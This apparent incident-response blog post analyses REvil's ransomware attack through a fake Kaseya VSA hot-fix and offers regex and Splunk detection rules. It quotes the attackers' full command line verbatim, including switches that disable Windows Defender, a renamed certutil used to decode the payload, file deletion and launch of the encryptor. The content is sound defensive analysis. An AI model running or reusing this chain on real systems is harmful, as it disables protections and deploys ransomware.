Kaseya MSP Incident Response
As someone with a history of working for MSPs, today might be one of the most memorable days for the remainder of my life. A very reputable hacking group, "REvil", has hacked the most widely used tool by IT companies for device access and administration, "Kaseya". This brings me to learn and produce an appropriate response to the attack, and share it with others.
I will first go into the basic flow and operation of the attack, then a deep dive into the IOCs we should look for, and a deeper dive into each one. From here I have worked with the community to develop SIEM rules surrounding these attacks. Quite often SIEM or SaaS services will not provide you with the logic behind their custom events, which can leave a security team between a rock and a hard place.
The Kaseya VSA agent drops a certificate file, "agent.crt", in the c:\kworking folder, which is then distributed as a Kaseya update with the name 'Kaseya VSA Agent Hot-fix'.
PowerShell is then executed and attempts to decode the certificate 'agent.crt' with the Windows certutil.exe binary. From here it extracts the decoded agent and redirects the output into a file named agent.exe within the same folder.
From here the agent.exe, signed using a malicious certificate, with MsMpEng.exe and mpsvc.dll embedded into it, unpacks as MsMpEng.exe and mpsvc.dll in the C:\Windows folder.
Below is a screenshot of the agent.exe extracting and launching the embedded files.
MsMpEng.exe is an out-of-date version of a legitimate Microsoft Defender executable, used here as a living-off-the-land binary (LOLBin). The malware makes no callbacks home, so relying on native binaries avoids triggering SIEM or other detection rule sets.
Ransomware encryptor is dropped to c:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix"
At least two tasks run the following:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul
/c - Specifies the command string that follows is to be passed to cmd.exe and executed
Ping - A command often used for testing communications with another device
-n - number of requests to send = 4979
> nul - hide the output by redirecting the ping results to nowhere.
Set-MpPreference - Lets you configure preferences for Windows Defender
DisableRealtimeMonitoring $true - Disables Windows Defender real-time monitoring
DisableIntrusionPreventionSystem $true - Responsible for network protection against exploitation of known vulnerabilities
DisableIOAVProtection $true - Indicates whether Defender will scan downloaded files and attachments.
DisableScriptScanning $true - Determines whether to disable scanning scripts during regular scans
EnableControlledFolderAccess Disabled - Responsible for blocking unauthorized access to folders
EnableNetworkProtection AuditMode -Force - Places Windows Defender Network Protection into AuditMode; speculation suggests this hides the pop-ups or warnings you would receive if it were switched fully off.
MAPSReporting Disabled - This effectively stops telemetry data being sent to the Microsoft Active Protection Service (MAPS) cloud.
SubmitSamplesConsent NeverSend - This effectively tells Windows Defender not to send threat reporting samples to Microsoft.
& copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe
Copies certutil.exe to the C:\Windows directory under the name cert.exe, then appends a random number to the copy (so the file's hash no longer matches the known certutil.exe).
& C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
Calls the renamed cert.exe to decode the Kaseya agent.crt and writes the output to agent.exe.
& del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Deletes the certificate file and the cert.exe copy, then launches agent.exe.
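Detection logic for the command chain broken down above, written as an added example (it is not from the original post): one regex per stage of the Hot-fix command, run over constructed process-creation command lines, with a combined severity so a lone certutil call does not fire the top verdict. Host names and the benign look-alike samples are made up.

```python
import re

# Indicators from the "Kaseya VSA Agent Hot-fix" command chain walked through above.
RULES = {
    # ping to localhost with a huge count is a sleep; 3+ digits skips a normal ping
    "ping_sleep": re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d{3,}", re.I),
    "defender_tamper": re.compile(
        r"Set-MpPreference.*?-Disable(RealtimeMonitoring|IOAVProtection|"
        r"ScriptScanning|IntrusionPreventionSystem)\s+\$true", re.I),
    "certutil_copy": re.compile(r"copy\s+/Y\s+\S*certutil\.exe\s+\S+", re.I),
    "random_append": re.compile(r"echo\s+%RANDOM%\s*>>", re.I),
    "certutil_decode": re.compile(r"(\S+\.exe)\s+-decode\s+\S+\.crt\s+\S+\.exe", re.I),  # group 1 = decoder
    "kworking_exec": re.compile(r"c:\\kworking\\agent\.exe", re.I),
}

def analyse(cmdline: str) -> dict:
    """Return matched indicator names and a severity for one process command line."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    m = RULES["certutil_decode"].search(cmdline)
    if m and not m.group(1).lower().endswith("certutil.exe"):
        hits.append("renamed_certutil")  # LOLBin copied under a new name (cert.exe above)
    if "defender_tamper" in hits and "certutil_decode" in hits:
        severity = "critical"  # AV disabled in the same chain that decodes a payload
    elif len(hits) >= 2:
        severity = "high"
    elif hits:
        severity = "low"
    else:
        severity = "none"
    return {"hits": sorted(hits), "severity": severity}

# Constructed sample command lines (not real telemetry). The first reproduces the
# Hot-fix chain quoted above; the other two are benign look-alikes that must not fire.
KASEYA_HOTFIX_CMD = (
    r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
    r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
    r'-DisableIOAVProtection $true -DisableScriptScanning $true '
    r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
    r'-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
    r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
    r'echo %RANDOM% >> C:\Windows\cert.exe & '
    r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
    r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'
)
SAMPLE_EVENTS = {  # hypothetical host names -> command line
    "WS-017": KASEYA_HOTFIX_CMD,
    "WS-022": r"certutil.exe -decode C:\Users\jdoe\bundle.crt C:\Users\jdoe\bundle.exe",
    "WS-031": "ping 127.0.0.1 -n 4 > nul",
}
```

Feed `analyse()` the command-line field of your process-creation events (Sysmon event 1 or Security 4688) and alert on "critical" or "high".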
One of the domains showed up under pastebin, and referenced a config file by the group which returned a larger list of domains used by them.
Interestingly enough the http:// page displays nothing from the community.
However under just the domain name without the prefix, we have a community mention of a pastebin file.
The hash is directly related to their malware.
Below is a brief description of the group's malware.
The domain list related to the Kaseya attack.
Custom Splunk Based SIEM Rules
First create a lookup table (a CSV with a single column named hostname, uploaded and given a lookup definition; kaseya_bad_hosts below is a placeholder for whatever you name it) and load the bad host names into it in lower case.
Then create a rule that defines the log source, normalises the destination hostname of each network event, matches it against the lookup table, and counts the results by action and matched host. Events with no match are filled with a placeholder value rather than dropped, so the counter still covers all traffic. Replace the index, sourcetype and destinationhostname field with those of your own network source.
index=<network_index> sourcetype=<network_sourcetype>
| eval hostname=lower(destinationhostname)
| lookup kaseya_bad_hosts hostname OUTPUT hostname AS suspicioushost
| fillnull value="none" suspicioushost
| stats count by action, suspicioushost
Registry Key Detection
index="windows" sourcetype=WinRegistry disabled=0 (type=set OR type=create OR type=delete OR type=rename) key_path="HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter"